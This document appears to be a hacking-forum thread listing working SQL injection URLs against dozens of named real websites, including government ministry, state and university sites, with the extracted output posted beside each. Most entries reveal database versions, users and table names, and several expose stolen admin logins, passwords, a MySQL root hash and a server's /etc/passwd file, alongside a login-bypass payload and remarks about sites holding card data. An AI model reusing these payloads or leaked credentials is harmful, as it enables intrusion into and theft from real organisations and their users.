http://www.prstan.eu/?pid=45&pid1=100000000&id=-34+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user( ),database(),version()),9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35--

Database Version: 5.1.32-community-log
Database name: prstandb
User name: prstanusr@localhost

Министерство Энергетики Российской Федерации
http://minenergo.gov.ru/news/?newssearch_posted=1&fday=9&fmonth=9&fyear=2009&sday=26&smonth=9&syear=2009'/**/Union/**/Select/**/1,2,3,concat_ws(0x3a,database(),user(),version()), 5,6,7,8,9/*
minenergo_base:minenergo_user@rosprom.org:5.0.45

http://www.flashsport.eu/public/video/a.php?id=1+uniON+seLEcT+1,version(),3,4,5,6
version - 5.0.82sp1-log

http://www.promal.pl/podstrony/galeriapowieksz.php?id_kat=6&id=-39+union+select+1,2,3,4,5,concat_ws(0x3a,user(),da tabase(),version()),7--

daber_promal@localhost:daber_promal:5.0.81

planet-loud.compr3
Сайт металюг =)
http://www.planet-loud.com/newsstory.php?news_id=null+union+all+select+1,2,3, 4,concat(0x2f,version(),0x2f,user(),0x2f,database( ),0x2f),6,7,8,9,10/*
/4.0.27-max-log/dbo75296323@212.227.119.46/db75296323/

http://www.vvv.goias.gov.br/index.php?idMateria=1;select+cast(version()||chr(5 8)||user||chr(58)||inet_server_port()+as+int)

PostgreSQL 8.1.5 on i386-pc-solaris2.10, compiled by GCC gcc (GCC) 3.4.6:vvv:5432

http://slovco.ru/sovremslov/yu/podrobno.php?id=-536+union+select+1,2,concat_ws(0x3a,user(),databas e(),version()),4,5--

root@localhost:slovco:5.0.60-log

PR:1
Тиц 10

root без пароля
file_priv:Y

http://www.snta.com/php/display.php?p=PR_SP_syndicator&s_id=-8+UNION+SELECT+1,2+FROM+SNTA_users/*

Database Version: 4.1.20
Database name: SNTA
User name: SNTAUser@localhost

http://postroikadomoff.ru/base.php?id=-8+union+select+1,2,3,concat_ws(0x3a,user(),databas e(),version())--

magazvic@localhost:magazvic_domoff:5.0.67-percona-highperf-b7-log
http://postroikadomoff.ru/base.php?id=-8+union+select+1,2,3,concat_ws%280x3a,unhex%28hex% 28username%29%29,unhex%28hex%28password%29%29%29+f rom+magazvic_domoff.jos_users--

http://postroikadomoff.ru/base.php?id=-8+union+select+1,2,3,concat_ws%280x3a,unhex%28hex% 28Login%29%29,unhex%28hex%28cust_password%29%29%29 +from+magazvic_allstroitechnika.ss_customers--

http://postroikadomoff.ru/base.php?id=-8+union+select+1,2,3,concat_ws%280x3a,unhex%28hex% 28user_name%29%29,unhex%28hex%28user_password%29%2 9%29+from+magazvic_domik.fusion_users--
Тиц 210

http://www.lyonshead.com/our_artists/detail.php?id=-16+union+select+1,2,concat_ws(0x3a,user(),version( ),database()),4,5,6,7,8,9,10--
lyonshead@localhost:5.0.22:lyonshead_com_-_lyonshead 2

nikvesti.com
http://www.nikvesti.com/news.php?id=-2446+union+select+1,2,3,version(),5,6,7,8,9,10,11, 12,13,14,15,16+--+
Version: 5.0.67-community-nt
Database:nikvesti
User: root@localhost

Таблицы:
http://www.nikvesti.com/news.php?id=-2446+union+select+1,2,3,table_name,5,6,7,8,9,10,11 ,12,13,14,15,16+from+information_schema.tables+lim it+0,1+--+

http://www.fozzy.ua/?page=newsdetails&newsID=179 and 1=0 union select 1,2,3,4,concat_ws('::',unhex(hex(database())),unhe x(hex(user())),unhex(hex(version()))),6,7,8,9,1,2, 3 --&lastPage=contentview

Жаль, но мускул версии 4.1.14
Есть таблица: login

http://korm.com.ua/?pid=6&oid=81%20and%201=0%20union%20select%201,2,3,4,5,6, 7,8,9,concat_ws%28%27::%27,database%28%29,user%28% 29,version%28%29%29%20from%20information_schema.ta bles--

Ну а здесь все просто и понятно))) + админка в стандартной директории: /admin

Оо 6 ветка, первый раз вижу
version:6.0.10-alpha-community-log
user: aos_new@localhost
database: aos_new


http://aos.com.ua/index.php?teg=2&task=-4+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2,3,4--

http://fdp-koeln.de/

http://www.fdp-koeln.de/printpage.php?tid=-3101+union+select+1,2,3,4,5,USER(),DATABASE(),VERS ION(),9,11,12,13/*

sportal-web29@localhost
Ort: sportal_web29
Veranstalter: 5.0.22

http://www.fdp-koeln.de/printpage.php?tid=-3101+union+select+1,2,3,4,5,USER(),DATABASE(),COLU MN_NAME,9,11,12,13+FROM+INFORMATION_SCHEMA.COLUMNS +WHERE+TABLE_NAME=0x616b7475656c6c6573+LIMIT+0,1/*

http://eleview.com/

http://support.eleview.com/message_box.php?theme=&l=flamingo&x=1&deptid=-999999+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, group_concat(login,char(58),password)v3n0m,0,0+fro m+chat_admin--

cutieplay.com - PR=1
http://www.cutieplay.com/game.php?id=1/**/anD/**/1=7%20/**/uniON/**/seLECT/**/1,2,conCat_ws(cHaR(42,42,42),user(),database(),ver sion()),4,5,6,7,8,9
user - alexandersshen@bart.dreamhost.com
database - cutieplay_db
version - 5.0.67-log


splashworks.com
http://www.splashworks.com/game.php?id=1/**/anD/**/substring(version(),1,1)=3/*
ветка - 3

....

henrilloyd.com pr5
Магаз какого-то пафосного хмыря :D
http://www.henrilloyd.com/news_open.asp?news_id=null'+union+all+select+null, null,concat_ws(0x2f,version(),user(),database()),n ull,null,null,null,null,null,null,null+--+
http://www.henrilloyd.com/news_open.asp?news_id=null'+union+all+select+null, null,concat_ws(0x2f,user_email,user_password),null ,null,null,null,null,null,null,null+from+users+lim it+0,1+--+
4.0.22-standard/hl_2007_a@localhost/hl_2007_a
chris@webpagesoftware.co.uk/nimda

http://www.ghcc.com Pr4


http://www.ghcc.com/news/news_details.asp?news_id=-990+union+select+VERSION(),2,3,DATABASE(),5,6,USER (),8,9,11--

ghc@localhost
db_hall_chamber
5.0.24-community-nt

http://www.ghcc.com/news/news_details.asp?news_id=-990+union+select+@@tmpdir,@@version_compile_os,3,@ @datadir,5,6,@@basedir,8,9,11%20--


C:\Program Files\MySQL\MySQL Server 5.0\
C:\Program Files\MySQL\MySQL Server 5.0\Data\ More Info
C:\WINDOWS\TEMP\
Win32


http://www.ghcc.com/news/news_details.asp?news_id=-990+union+select+VERSION(),2,3,DATABASE(),5,6,TABL E_NAME,8,9,11%20FROM%20INFORMATION_SCHEMA.TABLES%2 0LIMIT%200,1%20-- :

CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
events_attendance
products
tbl_photo_galleries
tbl_photos
tblevents
tblnews

http://www.kvazar.ru/price_new.htm?group_id=42&div=atrade&parent_group_id=-1+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4,5,6,7--
Database Version: 5.0.51a-community
Database name: db_kvazar1
User name: kvazar1@localhost


http://jogharta.com/produit.php?id=2+UNION+SELECT+1,concat_ws(0x3a,Ver sion(),database(),user()),3,4+LIMIT+1,1
Database Version: 5.0.44-log
Database name: jogharta
User name: jogharta@localhost


http://oms.hec.gov.pk/?comp=newsletter_display.php&id=12+UNION+SELECT+1,2,3,4,5,concat_ws(0x3a,Versio n(),database(),user()),7,8,9,10,11,12
Database Version: 5.0.22
Database name: HEC_OMS
User name: oms@localhost


http://www.langsfordcenter.com/our-result.php?id=-18+union+select+1,2,concat_ws(0x3a,Version(),datab ase(),user())
Database Version: 5.0.81-community-log
Database name: langsfor_langsfor
User name: langsfor_langsdb@localhost

PR=4


http://www.conservativetruth.org/article.php?id=5+union+select+1,2,3,4,5,6,7,8,9,10 ,11--
Blind-SQLINJ

http://www.sportformen.com/post.php?id_post=-1830+union+select+concat_ws(0x3a3a,name,surname,lo gin,password,stat),2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17+from+users+limit+2,1+/*+

PR4
http://www.opperaa.com/lista/listaEditoria.php?editoria_id_editoria=-2+union+select+1,2,3,4,concat_ws

(0x3a3a,idusuario,nome,senha,funcao,email),6,7,8,9 ,10,11,12,13,14,15+from+usuario+--+

http://www.mondobhz.com.br/lista/noticias.php?editoria_id_editoria=-2+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12 +from+information_schema.tables+--+

Pr7
http://casadachris.uol.com.br/blog/?id=-876'+union+select+1,2,3,4,5,6,7,8,9,10,11+/*+

pr5
http://sepultura.uol.com.br/a-lex/post.php?id_post=-13'+union+select+1,2,3,4,5,6,7,8,9,10,11,12+/*+

http://www.gmfcpfd.org/member.php?memid=-16+uNiOn+sElEcT+tAbLe_NaMe+from+information_schema .tables+--+

http://www.hutchrec.com/rec_page.php?id=-12+union+select+username,2,3,4+from+admin--

Database Version: 5.0.81-community
Database name: hutchrec_834957sdfk
User name: hutchrec_huzKSDF@localhost

http://www.teko.ca/crew.php?id=-1+union+select+1,2,3,4,5,6,7
Database Version: 5.0.67-userstats-log
Database name: teko
User name: teko@corvette.dreamhost.com

http://www.teko.ca/crew.php?id=-1+union+select+1,concat_ws(0x3a,id,name,pass),3,4, 5,6,7+from+board.accounts
1:Alex:{jvz}wuuq

http://www.e-proector.ru/info1.php?fi=-11+union+select+1,2,3,4,5,concat_ws(0x3a,user(),ve rsion(),database()),7,8,9--

ollrosa_e@localhost:5.0.44-log:ollrosa_e

http://www.e-proector.ru/info1.php?fi=-11+union+select+1,2,3,4,5,table_name,7,8,9+from+in formation_schema.tables--


CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
anons
indeks
inform
menu

http://www.ymyxh.com/ym.php?id=1+union+select+1,2,table_name,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30+from+information_schema.tables+limi t+1,1


https://www.boacoisa.com.br/?t=produto&cmpProduto=57&cmpCategoria=1+union+select+1,concat(0x3,version() ,database(),user()),3

4.1.22-community-ntboacoisa_boacoisaboaco_boacoisa@zeus.masterbizwi n.com.br

http://wanning.hainan.gov.cn/v6/news/file.php?id=-1+union+select+1,2,3,4,5,6,7,8,9
Database Version: 5.0.77-builded by Wang Xianren-log
Database name: wanning
User name: wanning@localhost

brainmelt.com -
http://www.brainmelt.com/game.php?id=1+anD+1=7%20+uniON+all+seLECT+1,2,conC At_wS(ChAR(42,42,42),user(),database(),version()), 4,5,6,7,8,9,10,11,12,13/*
user - dbo109168799@212.227.118.13
database - db109168799
version - 4.0.27-max-log


http://www.evilcountry.com/game.php?ID=1/**/aNd/**/substring(version(),1,1)=5/*
ветка - 5

Washington State Institute for Public Policy

http://www.wsipp.wa.gov/auth.asp?authid=92+OR+1=(select+@@version)
Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)

http://mgz.com.ua/catalog.php?category=-4+union+select+1,version(),3--&subcat=67

5.0.81-community-log

Software security

http://www.marx.biz/rc1/en/catalog.php?user_country=1;select+cast(version()+a s+int)

PostgreSQL 8.3.3 on i386-portbld-freebsd6.1, compiled by GCC cc (GCC) 3.4.4 [FreeBSD] 20050518

southserbia.com pr3
Карты городов южной сербии? нифига по ихнему не понимаю
http://www.southserbia.com/map/index.php?promo=null+union+all+select+null,null,nu ll,null,null,null,null,null,null,concat_ws(0x2f,0x 3C7363726970743E616C6572742827,version(),user(),da tabase(),0x27293C2F7363726970743E),null,null,null, null,null,null,null,null,null,null,null,null,null, null
5.0.45-log/southse_com@s253@194.9.94.7/southserbia_com

http://www.aware.ie/literatureItem.php?id=-31+UNION SELECT 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),ver sion()),4,5,6,7--
aware@mail.secure-ssl-server.org : aware : 4.1.22-community-nt
есть таблы с картоном)

http://www.aldaniti.net/

POST
email_zp=' or 1=1/*@antichat.ru&pass_zp=password

thx ElteRUS

Illinois General Assembly
http://www.ilga.gov/legislation/BillStatus.asp?DocNum=1&GAID=10&DocTypeID=SB'+AND+1=(select+@@version)--&LegId=39858&SessionID=76&GA=96
Microsoft SQL Server 2005 - 9.00.3310.00 (Intel X86) Dec 19 2008 00:58:18 Copyright (c) 1988-2005 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 1)

iem.com Pr4

Количество полей, вывод:
http://www.iem.com/NewsArticle.php?news_id=-53+union+select+1,2,3,4,5,6,7,8--

далее:

http://www.iem.com/NewsArticle.php?news_id=-53+union+select+1,2,3,4,USER(),DATABASE(),7,8--

root@localhost
iemcorp

ось:
OS : Windows NT VMWEBSRV 6.0 build 6001
Server : Microsoft-IIS/7.0
User : IUSR
pwd : C:\inetpub\wwwroot

http://www.caddealer.com/greenit/news.php?id=-1+union+select+1,2,3,4,5,6,7--

версия 5.0.45

www.rakebacknetwork.com
http://www.rakebacknetwork.com/featuredsites.php?id=-1%20union%20all%20select%201,2,concat_ws(0x3a,vers ion(),database(),user()),4,5,6,7,8,9,10,11,12,13,1 4,15,16,17--
4.1.20-community-nt:rakebacknetwork:rakebacknetwork@localhost

заказывал сигары, и чот решил посмотреть :( короче шоп сигар, крутите кому надо
http://www.bestcigars.ru/shop.php?typeid=1&subtypeid=2&brandid=-1+union+select+1,concat_ws(0x3a,table_name,column_ name)+from+information_schema.columns+limit+215,1+--+

http://www.brokenpencil.com/deathmatch/2008/view.php?id=2 +union+select+1,2,3,4--

database brokenpe

pr5
ponte_barca@localhost : ponte_barca : 4.1.22
http://www.pontedabarca.com.pt/destaque.php?id=-183+UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),versi on()),3,4,5,6,7--


it's my за свои деньги еще и травиться,раньше паровозил,щас не жалею что бросил.

<BlackSun>: домсигары - боян.
странно что за 2 года дыру так и не залепили

МВД [Министерство внутренних дел]


http://www.mvd.rkomi.ru/indexnews.php?id=-186+union+select+1,2,3,4,5,6,7+--

http://www.mvd.rkomi.ru/indexnews.php?id=-186+union+select+1,2,3,4,concat_ws(0x3a,version(), database(),user(),@@version_compile_os),6,7+--

version:5.0.51a
db:mvd
user:mvd@localhost
OS:suse-linux-gnu

Tables:
http://www.mvd.rkomi.ru/indexnews.php?id=-186+union+select+1,2,3,4,table_name,6,7+from+infor mation_schema.tables+--

anons
datamvd
gibdd
info
mail
memorial
news
orientirovki
pamiatki
rozisk
service
yhastk
yvdovd


http://www.mvd.rkomi.ru/indexnews.php?id=-186+union+select+1,2,3,4,COLUMN_NAME,6,7+from+INFO RMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='mail'+--

Structure of several tables

->mail:
+--------------------+
|id | service | email|
+--------------------+


->yhastk :
+-----------------------------------------------+
|id | name | email | tel | flag | raion | region|
+-----------------------------------------------+

->service:
+--------------------------+
|id | title | text |priznak|
+--------------------------+

->datamvd:
+-----------------------------------------------+
|id | name | path | prikaz | id1 | data | razmer|
+-----------------------------------------------+


->info:
+---------------------------+
|id | text | priznak | title|
+---------------------------+

//that's all

accel.com pr7
Сообщество буржуй-предпринимателей :)
http://www.accel.com/news/news_one_up.php?news_id=null'+union+all+select+nul l,null,null,concat_ws(0x2f,0x3C7363726970743E616C6 572742827,version(),user(),database(),0x27293C2F73 63726970743E),null+--+
Второй сервер:
http://careers.accel.com/jobdetail.php?jobid=27063+and+substring(version(), 1,1)=5
5.0.84-rs/accel_outty@localhost/Web_Admin_Live
второй серв 5 мускул, юзер 5vlmysqluser

ps/ всё в дырках

PR 6
http://www.planetfriendly.net/volunteer/vld.php?id=-7669+union+select+version(),2,3,4,5,6,7,8,9,0,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45 ,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,6 2,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77/*

Database Version: 4.1.18
Database name: db376790
User name: db376790@localhost

--------------------------------------------------------------------------------------------------

http://www.grosnor.com/main.news.php?NID=-541+union+select+1,unhex(hex(version())),3,4,5,6,7 ,8,9/*

DEBIAN !
http://sponsors.debian.net/viewpkg.php?id=9%20union%20select%201,database(),v ersion(),user(),5,6,7,8,9,10,11

5.0.51a-24+lenny1-log
maulkin@localhost
debian-sponsors

http://your.kingcounty.gov/solidwaste/facilities/cedar-transfer.asp?MaterialID=-1+or+1=system_user--&ID=-1+or+1=system_user--
system_user=rrd_public
http://apps.ecy.wa.gov/shorephotos/scripts/photosearch.asp?id=%27+or+1=system_user--
system_user=wsphoto_r
http://www-records.ncsu.edu/Grade/grollchk2.asp?prefix=%27+or+1=system_user--
system_user=web
http://www.it.unr.edu/detail.asp?id=-1+or+1=system_user--
system_user=web_dbreader
http://www.fisk.edu/page.asp?id=-1+or+1=system_user--
system_user=newwebuser
http://www.idwdra.iupui.edu/nav.asp?id=%27+or+1=system_user--
system_user=aspreader
http://www.ocgi.okstate.edu/shpo/shpopic.asp?id=-1+or+1=system_user--
system_user=shporead
http://www.globalplatform.org/content.asp?id=%27+or+1=system_user--
system_user=VZW372

http://www.r-and-p.ru/page.php?l=ru'&id=-1+union+select+1,2,3,4,5,6,7,version(),9--

4.1.25-log

http://www.ford-frenn.lu/scripts/auto.php?id=99999999999%20union%20select%201,2,3,g roup_concat%28table_name%29,5,6,7,8,9,10,11,12,13% 20from%20information_schema.tables%20--

Официальный сайт Николая Валуева

http://box-way.ru/news/view/509+union+select+1,2,3,concat_ws('%20:%20',user(), database(),version()),5,6/

user: boxway37@v48.valuehost.ru
database: boxway37
version: 4.0.27-max-log

Какой-то метал-сайт.
----------------------------------------------------------
http://extrememetal.ru/index.php?folder=2&text_id=1%20union%20select%201,2,concat_ws(0x3a,ve rsion(),database(),user()),4,5,6

bubbygames.com -
http://www.bubbygames.com/game.php?id=1/**/anD/**/1=7/**/uniON/**/seLECT/**/version(),2,3,database(),user(),6,7,8,9,0,1,2/*
version - 4.0.15a
database - bubbygames
user - root@localhost

mysql.user - on
user - root
password - 0abf9cbc2164d167

http://www.bubbygames.com/game.php?id=1/**/anD/**/1=7/**/uniON/**/seLECT/**/user,2,3,password,load_file('/etc/passwd'),6,7,8,9,0,1,2/**/FROM/**/mysql.user/*

root:x:0:0::/root:/bin/bash bin:x:1:1:bin:/bin: daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/log: lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/: news:x:9:13:news:/usr/lib/news: uucp:x:10:14:uucp:/var/spool/uucppublic: operator:x:11:0perator:/root:/bin/bash games:x:12:100:games:/usr/games: ftp:x:14:50::/home/ftp: smmsp:x:25:25:smmsp:/var/spool/clientmqueue: mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash rpc:x:32:32:RPC portmap user:/:/bin/false sshd:x:33:33:sshd:/: gdm:x:42:42:GDM:/var/state/gdm:/bin/bash pop:x:90:90:POP:/: nobody:x:99:99:nobody:/: donotreply:x:1000:100::/home/donotreply:

пр5
http://www.oklinne.nu/main/showpage.php?id=-1490+UNION SELECT 1,2,3,4,5,CONCAT_WS(CHAR(32,58,32),user(),database (),version()),7,8,9,10--
a0416601@madrid1.stadnet.levonline.com : a0416600_db1 : 4.0.27-standard

http://art.dn.ua/news_one.php?news_id=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26/*csuser@localhost.localdomain:citysite:4.0.16

dpl.gov.mp pr4
Department of Public Lands
http://www.dpl.gov.mp/new/detailed.php?article_id=null UNION SELECT null,null,concat_ws(0x2f,0x3C7363726970743E616C657 2742827,version(),user(),database(),0x27293C2F7363 726970743E),null
4.1.22-standard/mplagov@localhost/mplagov_mpla

http://joboteka.ru/ind.php?id_categ=74+union+select+1,2,3,4,5,table_n ame,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from +information_schema.tables--&tr=174

Версия: 5.0.67-log

Раскрытие путей... http://joboteka.ru/ind.php?id_categ[]=53&tr=1